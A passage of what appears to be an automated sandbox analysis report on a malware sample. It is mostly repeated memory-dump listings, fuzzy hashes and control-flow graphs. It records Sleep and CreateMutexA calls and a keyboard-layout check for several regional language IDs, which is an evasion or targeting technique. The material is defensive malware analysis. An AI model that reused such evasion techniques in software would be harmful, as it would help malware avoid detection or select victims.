                                                          • Associated: 00000000.00000002.1467102225.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467155428.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467186116.00000000005E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467265783.00000000005E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467308667.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467331767.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2d0000_UyiH4t5dph.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitProcess
                                                          • String ID:
                                                          • API String ID: 621844428-0
                                                          • Opcode ID: e1364e5dbc74a7c432d54d9c0f9208bc041f53572b3f400c9bbc693ffc29e72d
                                                          • Instruction ID: 919e572363387a254e571db59cbb585350a555be97fc0b611780fde7153b4ab0
                                                          • Opcode Fuzzy Hash: e1364e5dbc74a7c432d54d9c0f9208bc041f53572b3f400c9bbc693ffc29e72d
                                                          • Instruction Fuzzy Hash: 08E08C30102608AFCE26BB18DC3EE993B29EF42742F100905F8184A666CB35ED91C681
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1469582370.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_54a0000_UyiH4t5dph.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d05f8af3b822bf4069a170df503d5ed8506e9d3bd9f285a42acbfd98096255f7
                                                          • Instruction ID: 6a5b3c79e0b9fc6c0fc242b4d7de01f4c2e93c9cd153adcae1731711e129a869
                                                          • Opcode Fuzzy Hash: d05f8af3b822bf4069a170df503d5ed8506e9d3bd9f285a42acbfd98096255f7
                                                          • Instruction Fuzzy Hash: 4901FFBB00C110FE61C2C9232B1CAFA272BE1F63347709023F40F8A451D2648A6B9431
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1464681693.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                          • Associated: 00000000.00000002.1464656048.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464681693.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464800236.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464865315.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464886470.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465105384.00000000004A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465169337.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465206560.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465326334.00000000004B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465347617.00000000004B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465347617.00000000004C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465456215.00000000004CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465489162.00000000004CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465514994.00000000004D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465566647.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465587541.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465649423.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465681666.00000000004F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465812022.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465841886.00000000004FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465934999.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466061014.000000000051B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466117563.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466217899.000000000051E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466328011.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466360577.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466397140.0000000000537000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466508084.0000000000545000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466526095.0000000000546000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466560000.0000000000547000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466652427.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466668941.0000000000556000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466743514.0000000000557000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466802032.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466829157.0000000000562000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466829157.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466970424.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467010231.00000000005CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467081116.00000000005CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467102225.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467155428.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467186116.00000000005E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467265783.00000000005E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467308667.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467331767.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2d0000_UyiH4t5dph.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                          • API String ID: 0-3963862150
                                                          • Opcode ID: 496bbb9d1b5e683dd2c6a873fa24011b04a1ac84e96dab6f1cb39c3dd970a899
                                                          • Instruction ID: 62c9e536b92ceda1087e794f51f77b846578e86a6152de92972d0a64b6aa188a
                                                          • Opcode Fuzzy Hash: 496bbb9d1b5e683dd2c6a873fa24011b04a1ac84e96dab6f1cb39c3dd970a899
                                                          • Instruction Fuzzy Hash: F6F1D0709102589BEB24DF54CC85BDEBBB9EF44304F5042AAF508A7381DBB49E98CF94

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 644 2d9ba5-2d9d91 call 2e7a00 call 2d5c10 call 2d8b30 call 2e8220
                                                          APIs
                                                          • Sleep.KERNEL32(00000064), ref: 002DA963
                                                          • CreateMutexA.KERNEL32(00000000,00000000,00333254), ref: 002DA981
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1464681693.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                          • Associated: 00000000.00000002.1464656048.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464681693.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464800236.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464865315.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464886470.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465105384.00000000004A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465169337.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465206560.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465326334.00000000004B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465347617.00000000004B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465347617.00000000004C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465456215.00000000004CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465489162.00000000004CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465514994.00000000004D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465566647.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465587541.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465649423.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465681666.00000000004F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465812022.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465841886.00000000004FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465934999.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466061014.000000000051B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466117563.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466217899.000000000051E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466328011.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466360577.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466397140.0000000000537000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466508084.0000000000545000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466526095.0000000000546000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466560000.0000000000547000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466652427.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466668941.0000000000556000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466743514.0000000000557000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466802032.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466829157.0000000000562000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466829157.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466970424.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467010231.00000000005CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467081116.00000000005CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467102225.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467155428.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467186116.00000000005E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467265783.00000000005E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467308667.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467331767.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2d0000_UyiH4t5dph.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateMutexSleep
                                                          • String ID: T23
                                                          • API String ID: 1464230837-3327420953
                                                          • Opcode ID: a2d5beecd38f6a967b44377a05689cf42f0d93107222bf55038877559b8f4801
                                                          • Instruction ID: 75d8b34ee97f085ea7176d521c9cfba9c39000ec2cecec5c23fa03c21318d5b0
                                                          • Opcode Fuzzy Hash: a2d5beecd38f6a967b44377a05689cf42f0d93107222bf55038877559b8f4801
                                                          • Instruction Fuzzy Hash: C53128317642408BEB08EB78EC89B9EB766DB85314F20861BF018973E5C7758DE08751

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 666 2d9f44-2d9f64 670 2d9f66-2d9f72 666->670 671 2d9f92-2d9fae 666->671 672 2d9f88-2d9f8f call 2ed663 670->672 673 2d9f74-2d9f82 670->673 674 2d9fdc-2d9ffb 671->674 675 2d9fb0-2d9fbc 671->675 672->671 673->672 676 2da92b 673->676 680 2d9ffd-2da009 674->680 681 2da029-2da916 call 2e80c0 674->681 678 2d9fbe-2d9fcc 675->678 679 2d9fd2-2d9fd9 call 2ed663 675->679 683 2da953-2da994 Sleep CreateMutexA 676->683 684 2da92b call 306c6a 676->684 678->676 678->679 679->674 687 2da01f-2da026 call 2ed663 680->687 688 2da00b-2da019 680->688 695 2da9a7-2da9a8 683->695 696 2da996-2da998 683->696 684->683 687->681 688->676 688->687 696->695 698 2da99a-2da9a5 696->698 698->695
                                                          APIs
                                                          • Sleep.KERNEL32(00000064), ref: 002DA963
                                                          • CreateMutexA.KERNEL32(00000000,00000000,00333254), ref: 002DA981
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1464681693.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                          • Associated: 00000000.00000002.1464656048.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464681693.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464800236.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464865315.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464886470.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465105384.00000000004A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465169337.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465206560.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465326334.00000000004B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465347617.00000000004B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465347617.00000000004C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465456215.00000000004CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465489162.00000000004CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465514994.00000000004D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465566647.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465587541.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465649423.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465681666.00000000004F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465812022.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465841886.00000000004FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465934999.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466061014.000000000051B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466117563.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466217899.000000000051E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466328011.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466360577.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466397140.0000000000537000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466508084.0000000000545000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466526095.0000000000546000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466560000.0000000000547000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466652427.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466668941.0000000000556000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466743514.0000000000557000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466802032.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466829157.0000000000562000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466829157.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466970424.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467010231.00000000005CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467081116.00000000005CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467102225.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467155428.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467186116.00000000005E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467265783.00000000005E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467308667.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467331767.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2d0000_UyiH4t5dph.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateMutexSleep
                                                          • String ID: T23
                                                          • API String ID: 1464230837-3327420953
                                                          • Opcode ID: 3940d0b5d8cc6ea696785a66bee5234c84eca4dd155bce1ecdd2b83517ac827f
                                                          • Instruction ID: aa091378818c8c8aebd7d7b34e6bad38cc0396c5c90bc2550f47bd265e293714
                                                          • Opcode Fuzzy Hash: 3940d0b5d8cc6ea696785a66bee5234c84eca4dd155bce1ecdd2b83517ac827f
                                                          • Instruction Fuzzy Hash: E43168317241408FEB18EB78DC99BADB766EF85310F20861AF018D77D1C7758DA08752

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 700 2da079-2da099 704 2da09b-2da0a7 700->704 705 2da0c7-2da0e3 700->705 708 2da0bd-2da0c4 call 2ed663 704->708 709 2da0a9-2da0b7 704->709 706 2da0e5-2da0f1 705->706 707 2da111-2da130 705->707 712 2da107-2da10e call 2ed663 706->712 713 2da0f3-2da101 706->713 714 2da15e-2da916 call 2e80c0 707->714 715 2da132-2da13e 707->715 708->705 709->708 710 2da930 709->710 718 2da953-2da994 Sleep CreateMutexA 710->718 719 2da930 call 306c6a 710->719 712->707 713->710 713->712 721 2da154-2da15b call 2ed663 715->721 722 2da140-2da14e 715->722 729 2da9a7-2da9a8 718->729 730 2da996-2da998 718->730 719->718 721->714 722->710 722->721 730->729 732 2da99a-2da9a5 730->732 732->729
                                                          APIs
                                                          • Sleep.KERNEL32(00000064), ref: 002DA963
                                                          • CreateMutexA.KERNEL32(00000000,00000000,00333254), ref: 002DA981
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1464681693.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                          • Associated: 00000000.00000002.1464656048.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464681693.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464800236.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464865315.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464886470.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465105384.00000000004A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465169337.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465206560.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465326334.00000000004B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465347617.00000000004B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465347617.00000000004C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465456215.00000000004CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465489162.00000000004CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465514994.00000000004D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465566647.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465587541.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465649423.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465681666.00000000004F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465812022.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465841886.00000000004FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465934999.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466061014.000000000051B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466117563.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466217899.000000000051E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466328011.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466360577.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466397140.0000000000537000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466508084.0000000000545000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466526095.0000000000546000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466560000.0000000000547000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466652427.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466668941.0000000000556000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466743514.0000000000557000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466802032.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466829157.0000000000562000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466829157.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466970424.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467010231.00000000005CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467081116.00000000005CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467102225.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467155428.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467186116.00000000005E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467265783.00000000005E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467308667.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467331767.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2d0000_UyiH4t5dph.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateMutexSleep
                                                          • String ID: T23
                                                          • API String ID: 1464230837-3327420953
                                                          • Opcode ID: e48b5f1dba8a620f7c0d91f0fc05083c30b4d196c12f34b77a55d7ba45396d51
                                                          • Instruction ID: 0b23f250d651a36e3360e5017e6fe8e000600ae16da09f43b7769753275ba7a7
                                                          • Opcode Fuzzy Hash: e48b5f1dba8a620f7c0d91f0fc05083c30b4d196c12f34b77a55d7ba45396d51
                                                          • Instruction Fuzzy Hash: B43124317642409BEB08DB78DC89FADB766EB85310F24861AE018D73E5C7769DA08662

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 734 2da1ae-2da1ce 738 2da1fc-2da218 734->738 739 2da1d0-2da1dc 734->739 740 2da21a-2da226 738->740 741 2da246-2da265 738->741 742 2da1de-2da1ec 739->742 743 2da1f2-2da1f9 call 2ed663 739->743 744 2da23c-2da243 call 2ed663 740->744 745 2da228-2da236 740->745 746 2da267-2da273 741->746 747 2da293-2da916 call 2e80c0 741->747 742->743 748 2da935 742->748 743->738 744->741 745->744 745->748 751 2da289-2da290 call 2ed663 746->751 752 2da275-2da283 746->752 754 2da953-2da994 Sleep CreateMutexA 748->754 755 2da935 call 306c6a 748->755 751->747 752->748 752->751 763 2da9a7-2da9a8 754->763 764 2da996-2da998 754->764 755->754 764->763 766 2da99a-2da9a5 764->766 766->763
                                                          APIs
                                                          • Sleep.KERNEL32(00000064), ref: 002DA963
                                                          • CreateMutexA.KERNEL32(00000000,00000000,00333254), ref: 002DA981
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1464681693.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                          • Associated: 00000000.00000002.1464656048.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464681693.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464800236.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464865315.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
